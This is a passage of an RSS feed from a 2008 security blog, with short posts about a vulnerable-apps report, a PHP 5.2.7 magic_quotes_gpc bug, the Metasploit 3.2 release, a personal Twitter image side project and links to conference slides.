		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/FYgiSM6PQhw/</link>
		<comments>http://security.searix.net/?p=80#comments</comments>
		<pubDate>Tue, 16 Dec 2008 17:26:40 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[applications]]></category>

		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=80</guid>
		<description><![CDATA[<br/>So Bit9 has released a paper on the top vulnerable apps in 2008. Firefox tops the list with 10 vulnerabilities that &#8220;allows hackers to gain control of your computer and steal passwords&#8221;.
Take a look at the paper here - http://www.bit9.com/files/Vulnerable_Apps_DEC_08.pdf
(Cross-posted on HackQuest, TheBlackSheep and Net-Force)
]]></description>
			<content:encoded><![CDATA[<br/><p>So Bit9 has released a paper on the top vulnerable apps in 2008. Firefox tops the list with 10 vulnerabilities that &#8220;allows hackers to gain control of your computer and steal passwords&#8221;.</p>
<p>Take a look at the paper here - http://www.bit9.com/files/Vulnerable_Apps_DEC_08.pdf</p>
<p>(Cross-posted on <a title="HackQuest" href="http://www.hackquest.de" target="_blank">HackQuest</a>, <a title="TheBlackSheep" href="http://www.bright-shadows.net/" target="_blank">TheBlackSheep</a> and <a title="Net-Force" href="http://www.net-force.nl" target="_blank">Net-Force</a>)</p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=80</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=80</feedburner:origLink></item>
		<item>
		<title>PHP 5.2.7 breaks magic_quotes_gpc</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/CSIyU4S5KU4/</link>
		<comments>http://security.searix.net/?p=78#comments</comments>
		<pubDate>Sun, 07 Dec 2008 17:18:26 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Random]]></category>

		<category><![CDATA[php]]></category>

		<category><![CDATA[vulnerabilities]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=78</guid>
		<description><![CDATA[<br/>Every once in a while, you&#8217;ll find that an upgraded version of a software isn&#8217;t the best version of it to have. In PHP 5.2.7, magic_quotes_gpc is permanently disabled, not that you should be relying on it anyway.
The fix for this was alreaday commited to the PHP CVS so grab a snapshot if you&#8217;d like. [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Every once in a while, you&#8217;ll find that an upgraded version of a software isn&#8217;t the best version of it to have. In PHP 5.2.7, magic_quotes_gpc is permanently disabled, not that you should be relying on it anyway.</p>
<p>The fix for this was alreaday commited to the <a href="http://cvs.php.net/viewvc.cgi/php-src/ext/filter/filter.c?r1=1.52.2.43&amp;r2=1.52.2.44&amp;pathrev=PHP_5_2" target="_blank">PHP CVS</a> so grab a snapshot if you&#8217;d like. Otherwise, PHP 5.2.8 will be released next week.</p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=78</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=78</feedburner:origLink></item>
		<item>
		<title>MetaSploit Framework 3.2</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/u0QwrA2v7FQ/</link>
		<comments>http://security.searix.net/?p=76#comments</comments>
		<pubDate>Wed, 19 Nov 2008 17:41:30 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Bits and Pieces]]></category>

		<category><![CDATA[metasploit]]></category>

		<category><![CDATA[owasp]]></category>

		<category><![CDATA[proxy cache]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=76</guid>
		<description><![CDATA[<br/>
No, the above image does not have anything to do with what I&#8217;m going to blog about. I just find it creative and amusing.  
Well anyways, MetaSploit Framework 3.2 is released. Almost all modules have IPv6 support now and there&#8217;s a bunch of other cool new updates. Be sure to check it out!
As a [...]]]></description>
			<content:encoded><![CDATA[<br/><p><img class="aligncenter" title="Whale YMCA" src="http://icanhascheezburger.files.wordpress.com/2008/11/funny-pictures-whale-demonstrates-the-ymca-dance.jpg" alt="" width="236" height="176" /></p>
<p>No, the above image does not have anything to do with what I&#8217;m going to blog about. I just find it creative and amusing. <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Well anyways, <a href="http://metasploit.com/framework/" target="_blank">MetaSploit Framework 3.2</a> is released. Almost all modules have IPv6 support now and there&#8217;s a bunch of other cool new updates. Be sure to check it out!</p>
<p>As a side note, Onn Chee has pointed out in the security meetup mailing list, a presentation by Tim Bass on the insecurity of proxy caches. See his <a href="http://www.thecepblog.com/2008/10/28/comments-on-proxy-caches-and-web-application-security-owasp-taipei/" target="_blank">blog post</a> and his <a href="http://www.thecepblog.com/pdf/OWASP-TAIPEI-Thailand-TBass.pdf" target="_blank">presentation</a> (presented at <a href="http://www.owasp.org/index.php/OWASP_AppSec_Asia_2008" target="_blank">OWASP AppSec Asia 2008</a>). It&#8217;s a good read.</p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=76</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=76</feedburner:origLink></item>
		<item>
		<title>Side Project: TwitImage</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/Zm0MsyO0Epo/</link>
		<comments>http://security.searix.net/?p=69#comments</comments>
		<pubDate>Tue, 11 Nov 2008 03:56:25 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Random]]></category>

		<category><![CDATA[side project]]></category>

		<category><![CDATA[twitimage]]></category>

		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=69</guid>
		<description><![CDATA[<br/>Lately I&#8217;ve been working (somewhat) on a little side project that&#8217;s got nothing to do with security - TwitImage

Basically what TwitImage does is to retrieve your latest Twitter update every hour and display it on an image on a background. You can login to TwitImage using your Twitter username and password (courtesy of Twitter&#8217;s REST [...]]]></description>
			<content:encoded><![CDATA[<br/><p>Lately I&#8217;ve been working (somewhat) on a little side project that&#8217;s got nothing to do with security - <a href="http://www.twitimage.com/" target="_blank">TwitImage</a></p>
<p><a href="http://www.twitimage.com/" target="_blank"><img class="aligncenter" title="Alt3rn4tiv3s Twitimage" src="http://www.twitimage.com/sig2.php?username=alt3rn4tiv3" alt="" width="468" height="60" /></a></p>
<p>Basically what <a href="http://www.twitimage.com/" target="_blank">TwitImage</a> does is to retrieve your latest Twitter update every hour and display it on an image on a background. You can login to TwitImage using your Twitter username and password (courtesy of Twitter&#8217;s REST API) to modify how you want your <a href="http://www.twitimage.com/" target="_blank">TwitImage</a> to look like. You are free to change fonts, font size, font colour, text alignment and save them to be generated that way each time.</p>
<div id="attachment_70" class="wp-caption aligncenter" style="width: 310px"><a href="http://security.searix.net/wp-content/uploads/2008/11/twitimage.jpg"><img class="size-medium wp-image-70" title="TwitImage" src="http://security.searix.net/wp-content/uploads/2008/11/twitimage-300x242.jpg" alt="Yes, I know the site looks ugly for now. :)" width="300" height="242" /></a><p class="wp-caption-text">Yes, I know the site looks ugly for now. :)</p></div>
<p>Hope you guys enjoy <a href="http://www.twitimage.com/" target="_blank">TwitImage</a> <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>A complementary desktop application <a href="http://twitella.chalitnc.com/" target="_blank">Twitella</a> (made with Flex / AIR) was created by Chalit. It rides on the REST API as well and provides all the functionalities that Twitter provides, allowing you to post status updates, direct messages and all. You don&#8217;t have to put up with all of Twitter&#8217;s timeouts either. <img src='http://security.searix.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><a href="http://twitella.chalitnc.com/" target="_blank"><img class="aligncenter size-medium wp-image-71" title="Twitella" src="http://security.searix.net/wp-content/uploads/2008/11/twitella-300x202.png" alt="" width="300" height="202" /></a></p>
<p>Enjoy these apps <img src='http://security.searix.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=69</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=69</feedburner:origLink></item>
		<item>
		<title>VirusBulletin 2008, ToorCon X, OWASP NYC 2008, HITB Media</title>
		<link>http://feedproxy.google.com/~r/SearixSecurityBlog/~3/pwfjwZSCeZY/</link>
		<comments>http://security.searix.net/?p=65#comments</comments>
		<pubDate>Sat, 08 Nov 2008 18:26:45 +0000</pubDate>
		<dc:creator>alt3rn4tiv3</dc:creator>
		
		<category><![CDATA[Events]]></category>

		<category><![CDATA[hitb]]></category>

		<category><![CDATA[Media]]></category>

		<category><![CDATA[OWASP NYC 2008]]></category>

		<category><![CDATA[ToorCon X]]></category>

		<category><![CDATA[VirusBulletin 2008]]></category>

		<guid isPermaLink="false">http://security.searix.net/?p=65</guid>
		<description><![CDATA[<br/>Virus Bulletin 2008 Slides -
http://www.virusbtn.com/conference/vb2008/slides/index
ToorCon X Presentations -
http://security4all.blogspot.com/2008/11/toorcon-x-presentations-online-plus.html
OWASP 2008 Videos -
http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference
HITB Slides -
http://conference.hitb.org/hitbsecconf2008kl/materials/
]]></description>
			<content:encoded><![CDATA[<br/><p>Virus Bulletin 2008 Slides -<br />
<a href="http://www.virusbtn.com/conference/vb2008/slides/index" target="_blank">http://www.virusbtn.com/conference/vb2008/slides/index</a></p>
<p>ToorCon X Presentations -<br />
<a href="http://security4all.blogspot.com/2008/11/toorcon-x-presentations-online-plus.html" target="_blank">http://security4all.blogspot.com/2008/11/toorcon-x-presentations-online-plus.html</a></p>
<p>OWASP 2008 Videos -<br />
<a href="http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference" target="_blank">http://www.owasp.org/index.php/OWASP_NYC_AppSec_2008_Conference</a></p>
<p>HITB Slides -<br />
<a href="http://conference.hitb.org/hitbsecconf2008kl/materials/" target="_blank">http://conference.hitb.org/hitbsecconf2008kl/materials/</a></p>
]]></content:encoded>
			<wfw:commentRss>http://security.searix.net/?feed=rss2&amp;p=65</wfw:commentRss>
		<feedburner:origLink>http://security.searix.net/?p=65</feedburner:origLink></item>
	</channel>
</rss>
